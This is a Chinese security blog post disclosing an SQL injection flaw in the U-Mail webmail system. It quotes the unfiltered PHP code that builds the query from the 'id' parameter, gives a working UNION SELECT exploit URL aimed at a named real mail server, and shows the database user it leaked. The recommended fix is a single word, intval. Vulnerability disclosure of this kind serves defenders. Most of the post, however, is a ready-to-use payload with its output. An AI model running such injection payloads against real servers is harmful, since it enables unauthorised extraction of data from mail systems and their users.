纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

U-Mail邮件服务系统最新版SQL注入漏洞 – 网站安全

2020-10-11 分类:黑客攻防 阅读(682) 评论(0) 扫描二维码 隐藏侧边

漏洞文件:client\option\module\views.php

 

if ( ACTION == "letterpaper" )
{
$lp_id = gss( $_GET['id'] );
if ( $lp_id )
{
if ( $lp_id == "add" )
{
$lp_info['letterpaper'] = "<div id=\"lp_wrap\" style=\"background-color:#fff;color:#000;font-size:12px;padding:20px 30px;\"><div id=\"lp_wrap_content\"></div></div>";
}
else
{
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
}
}
else
{
$lp_list = $Widget->get_letterpaper( array(
"fields" => "*",
"where" => "UserID=0 or UserID=".$user_id,
"orderby" => "UserID",
"debug" => 0
) );
}
include( load_tpl( "op_letterpaper" ) );
}

未过滤直接进入查询

$lp_info = $Widget->getone_letterpaper( “id=”.$lp_id, “*”, 0 );

 

http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8

 

<div class="hasselect" style="display:none;" id="hasPic">
<span>背景图片:</span>
<div class="bgtypecontrol">
<img id="littleimg" src="umail@localhost">

U-Mail邮件服务系统最新版SQL注入漏洞 – 网站安全插图

 

U-Mail邮件服务系统最新版SQL注入漏洞 – 网站安全插图1

 

修复方案:

intval
    上一篇: Hdwiki最新版二次注入一枚 – 网站安全 – 自学php

    下一篇: 乐视MySQL盲注、callback反射型XSS及一处绝对路径泄

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » U-Mail邮件服务系统最新版SQL注入漏洞 – 网站安全
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录